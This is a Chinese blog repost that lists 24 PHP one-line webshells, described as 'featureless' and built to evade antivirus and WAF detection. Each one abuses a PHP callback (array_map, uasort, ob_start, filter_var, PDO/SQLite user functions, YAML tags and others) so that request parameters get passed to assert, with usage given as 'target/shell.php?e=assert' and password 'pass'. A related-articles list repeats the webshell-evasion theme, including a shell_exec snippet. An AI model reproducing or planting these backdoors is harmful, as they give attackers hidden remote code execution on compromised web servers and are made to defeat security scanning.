php 无特征一句话,分享一些无特征PHP一句话命令

最新推荐文章于 2024-03-16 18:00:00 发布
最新推荐文章于 2024-03-16 18:00:00 发布
阅读量228 收藏
点赞数
文章标签: php 无特征一句话

类别:Linux / 日期:2020-06-26 / 浏览:394 / 评论:0 分享一些不需要动态函数、不用eval、不含敏感函数、免杀免拦截的一句话。(少部分一句话需要php5.4.8+、或sqlite/pdo/yaml/memcached扩展等)

432fe0b09a042bbfb1d35ca1e5a7b82b.png原理:https://www.leavesongs.com/PENETRATION/php-callback-backdoor.html

所有一句话使用方法基本都是:http://target/shell.php?e=assert 密码pass#01

$e = $_REQUEST['e'];

$arr = array($_POST['pass'],);

array_filter($arr, $e);

#02

$e = $_REQUEST['e'];

$arr = array($_POST['pass'],);

array_map($e, $arr);

#03

$e = $_REQUEST['e'];

$arr = array('test', $_REQUEST['pass']);

uasort($arr, $e);

#04

$e = $_REQUEST['e'];

$arr = array('test' => 1, $_REQUEST['pass'] => 2);

uksort($arr, $e);

#05

$arr = new ArrayObject(array('test', $_REQUEST['pass']));

$arr->uasort('assert');

#06

$arr = new ArrayObject(array('test' => 1, $_REQUEST['pass'] => 2));

$arr->uksort('assert');

#07

$e = $_REQUEST['e'];

$arr = array(1);

array_reduce($arr, $e, $_POST['pass']);

#08

$e = $_REQUEST['e'];

$arr = array($_POST['pass']);

$arr2 = array(1);

array_udiff($arr, $arr2, $e);

#09

$e = $_REQUEST['e'];

$arr = array($_POST['pass'] => '|.*|e',);

array_walk($arr, $e, '');

#10

$e = $_REQUEST['e'];

$arr = array($_POST['pass'] => '|.*|e',);

array_walk_recursive($arr, $e, '');

#11

mb_ereg_replace('.*', $_REQUEST['pass'], '', 'e');

#12

echo preg_filter('|.*|e', $_REQUEST['pass'], '');

#13

ob_start('assert');

echo $_REQUEST['pass'];

ob_end_flush();

#14

$e = $_REQUEST['e'];

register_shutdown_function($e, $_REQUEST['pass']);

#15

$e = $_REQUEST['e'];

declare(ticks=1);

register_tick_function($e, $_REQUEST['pass']);

#16

filter_var($_REQUEST['pass'], FILTER_CALLBACK, array('options' => 'assert'));

#17

filter_var_array(array('test' => $_REQUEST['pass']), array('test' => array('filter' => FILTER_CALLBACK, 'options' => 'assert')));

#18

$e = $_REQUEST['e'];

$db = new PDO('sqlite:sqlite.db3');

$db->sqliteCreateFunction('myfunc', $e, 1);

$sth = $db->prepare("SELECT myfunc(:exec)");

$sth->execute(array(':exec' => $_REQUEST['pass']));

#19

$e = $_REQUEST['e'];

$db = new SQLite3('sqlite.db3');

$db->createFunction('myfunc', $e);

$stmt = $db->prepare("SELECT myfunc(?)");

$stmt->bindValue(1, $_REQUEST['pass'], SQLITE3_TEXT);

$stmt->execute();

#20

$str = urlencode($_REQUEST['pass']);

$yaml = <<

greeting: !{$str} "|.+|e"

EOD;

$parsed = yaml_parse($yaml, 0, $cnt, array("!{$_REQUEST['pass']}" => 'preg_replace'));

#21

$mem = new Memcache();

$re = $mem->addServer('localhost', 11211, TRUE, 100, 0, -1, TRUE, create_function('$a,$b,$c,$d,$e', 'return assert($a);'));

$mem->connect($_REQUEST['pass'], 11211, 0);

#22

preg_replace_callback('/.+/i', create_function('$arr', 'return assert($arr[0]);'), $_REQUEST['pass']);

#23

mb_ereg_replace_callback('.+', create_function('$arr', 'return assert($arr[0]);'), $_REQUEST['pass']);

#24

$iterator = new CallbackFilterIterator(new ArrayIterator(array($_REQUEST['pass'],)), create_function('$a', 'assert($a);'));

foreach ($iterator as $item) {echo $item;}法律声明

1.请遵守中华人民共和国相关法律、条例

2.本站提供的各类工具及文章,只可研究学习,本站对使用这些工具(文章)而导致的一切后果,不承担任何责任!

3.本站不保证提供的软件十分安全或是完全可用,请下载后自行检查

4.如不同意以上声明,请立即删除,不要使用,谢谢合作

感谢您的打赏~

打开支付宝扫一扫,即可进行扫码打赏哦~

版权声明 :本文未使用任何知识共享协议授权,您可以任何形式自由转载或使用 / Article Is Not Licensed Under Any Creative Commons License, And You May Freely Reprint Or Use It In Any Form

Cobo钱包
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
自用php一句木马绝对免杀没有任何关键字
不是专家的专栏
11-14 1万+
该代码是本人自己编写,可变性极大,基本不可能被查杀,代码里面没有任何关键字,而且很容易把代码弄的非常复杂。 使用方法: 1.在网站建立一个xxx.php,内容放入一句代码。(这里是演示,xxx.php可以是任何可以访问的文件) 2.建立一个demo.html,内容如下 textarea里面写上任何想执行php的代码,注意代码格式必须规范。--> phpinfo(
免杀代码—— 一句php
01-15
收集于互联网,仅限个人研究使用。
【免杀】————2、php免杀木马的思路
Fly_鹏程万里
03-04 1644
一般的,利用能够执行系统命令、加载代码的函数,或者组合一些普通函数,完成一些高级间谍功能的网站后门的脚本,叫做 Webshell。 本篇文章主要探讨关于 PHP 语言的 Webshell 检测工具和平台的绕过方法,实现能够绕过以下表格中 7 个主流(基本代表安全行业内 PHP Webshell检测的一流水平)专业工具和平台检测的 PHP Webshell,构造出零提示、无警告、无法被检测到的一句...
渗透干货|史上最全一句木马
最新发布
2201_75362610的博客
03-16 1319
/可执行命令一句密码-7ASPX一句的 过安全狗效果不怎么样不过我认为能支持aspx 百分之8/90支持asp原来代码是 把标签修改替换下来 为execute request(“cmd”) 这样就避开了符号!表中数据段限制,一句木马也写不下的情况网络中流传的最小的木马代码是 如过连这也写不下怎么办?
小马的免杀
sweetie 的博客
04-12 801
一般的php一句后门很容易被网站防火墙waf拦截,而waf通常通过判断关键字来辨别一句木马,要想绕过waf就需要对木马进行一些变形。(仅供分享经验,不可用作非法用途) 图片来源 一.先看一只有趣的小马 <?php ($b4dboy = $_POST['b4dboy']) &&@preg_replace('/ad/e','@'.str_rot13('riny')."($b4dboy)", 'add'); ?> 沙箱检测它是安全文件 用D盾查杀只是发现可以的str_rot1
2023年网络安全面试题(渗透测试):详细答案解析与最佳实践分享
热门推荐
weixin_43263566的博客
07-18 1万+
命令执行漏洞指攻击者可以随意执行系统命令的漏洞。当攻击成功后,攻击者可以继承Web服务程序的权限,执行任意代码、读写文件,甚至控制整个网站或服务器,甚至进一步进行内网渗透。内网攻击莫忽视:在流量分析过程中,不要忽视内网的攻击行为。内网攻击可能是来自恶意软件、僵尸网络或内部威胁等,及时发现和响应内网攻击至关重要。企图告警需排查:当发出告警信号时,需要仔细排查可能的企图行为。不仅要关注被攻击的目标,还要查看攻击者的来源、攻击方法和可能的目的,以便更好地理解攻击行为。
文件上传漏洞-原理篇
AkangBoy的博客
12-02 3210
本文主要介绍文件上传漏洞原理、危害等基础知识,以及常见的文件上传检测机制和绕过手段
php特征一句,分享一些无特征PHP一句
weixin_40000131的博客
03-17 197
分享些不需要动态函数、不用eval、不含敏感函数、免杀免拦截的一句。(少部分一句需要php5.4.8+、或sqlite/pdo/yaml/memcached扩展等)原理:https://www.leavesongs.com/PENETRATION/php-callback-backdoor.html所有一句使用方法基本都是:http:// target/shell.php?e=assert ...
分享一些无特征PHP一句
weixin_34179968的博客
11-20 450
分享些不需要动态函数、不用eval、不含敏感函数、免杀免拦截的一句。(少部分一句需要php5.4.8+、或sqlite/pdo/yaml/memcached扩展等) 原理:https://www.leavesongs.com/PENETRATION/php-callback-backdoor.html 所有一句使用方法基本都是: http:// target/shell.php?e=asse...
特征隐藏php一句,【转】超级隐蔽的PHP一句后门
weixin_39830387的博客
04-16 353
我们以一个学习的心态来对待这些PHP后门程序,很多PHP后门代码让我们看到程序员们是多么的用心良苦。强悍的PHP一句后门这类后门让网站、服务器管理员很是头疼,经常要换着方法进行各种检测,而很多新出现的编写技术,用普通的检测方法是没法发现并处理的。今天我们细数一些有意思的PHP一句木马。利用404页面隐藏PHP小马:010203404 Not Found0405Not Found06The re...
PHP特征webshell
zzgslh的博客
04-03 717
PHP特征webshell webshell就是将php、asp代码以网页的形式,编写成命令、代码执行的环境,可用于作为网站后门。webshell形式可谓是千变万化,但是总会存在一些文件和代码特征,从而可能被杀毒软件查杀,但是我们如何能做到无文件、无特征,来规避杀毒软件的查杀和检测呢? 常见php代码种可执行命令函数: eval()、assert()、preg_replace()、creat...
精简&明文免杀冰蝎php一句.php
10-30
php一句免杀绕过安全狗、D盾等WAF防护软件 可以轻松绕过 waf 的检测
php一句cmdshell新型 (非一句木马)
10-30
php运行时如果遇见字符``(键盘上~符号的下档键)总会尝试着执行``里面包含的命令,并返回命令执行的结果(string类型);
PHP隐形一句后门,和ThinkPHP框架加密码程序(base64_decode)
10-28
今天一个客户的服务器频繁被写入一句后门,删除了还有,原来在程序中加入了如下代码,大家可以注意下base64_decode函数的参数。
php实现批量查询清除一句后门的代码
10-30
一句后门一般简单,容易隐藏危害大,查找麻烦等。今天发现了这个Xall.php专门批量查询干掉一句后门的代码,大家可以省去不少麻烦了
阿里云的语音识别(一句识别) SDK PHP代码实现
10-24
在阿里云上的语音识别竟然没有PHP的SDK,而通过他们官方的所谓PHP的openSDK根本也没办法使用,于是,我基于他们的JAVA SDK改写成了PHP SDK,绝对可用!! 里面有些类是挪用了阿里云的官方php OpenSDK中core的代码 ...
PHP中使用glob函数实现一句删除某个目录下的所有文件
10-25
主要介绍了PHP中使用glob函数实现一句删除某个目录下的所有文件,重点在glob函数的使用上,需要的朋友可以参考下
php一句调用,PHP执行命令一句
weixin_34460480的博客
03-10 104
Beats By Dr Dre Studio Pittsburgh Steelers HighDefinition UK:Beats By Dr.Dre Studio Colorful Champagne Limited Edition UK,Beats By Dr.Dre Studio Colorware Chrome Limited Edition UK,Beats By Dr.Dre Stu...
php超强后门在任意位置创建文件,web后门 那些强悍猥琐流的PHP一句后门大全分享...
weixin_36094492的博客
03-09 431
强悍的PHP一句后门这类后门让网站、服务器管理员很是头疼,经常要换着方法进行各种检测,而很多新出现的编写技术,用普通的检测方法是没法发现并处理的。今天我们细数一些有意思的PHP一句木马。利用404页面隐藏PHP小马:复制代码代码如下:404 Not FoundNot FoundThe requested URL was not found on this server.@preg_replac...
php一句木马图片马
01-30
根据提供的引用内容,PHP一句木马是一种利用PHP语言特性的恶意代码,它可以在服务器上执行命令并返回结果。而图片马是一种将恶意代码嵌入到图片文件中的攻击方式。下面是一个示例,展示了如何在PHP一句木马中使用图片马的方法: ```php <?php $cmd = $_GET['cmd']; // 通过GET请求获取命令 // 执行命令并返回结果 $result = shell_exec($cmd); // 将结果输出到图片文件 header("Content-Type: image/jpeg"); imagejpeg($result); ?> ``` 在上述示例中,我们通过`$_GET['cmd']`获取用户传递的命令,并使用`shell_exec()`函数执行该命令。然后,我们将命令执行的结果作为图片文件输出,通过`imagejpeg()`函数将结果转换为JPEG格式的图片。 请注意,这只是一个示例,用于演示PHP一句木马中使用图片马的原理。在实际应用中,使用这种方式进行攻击是违法的,并且严重侵犯了他人的隐私和安全。我强烈建议您遵守法律法规,并保护自己和他人的网络安全。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值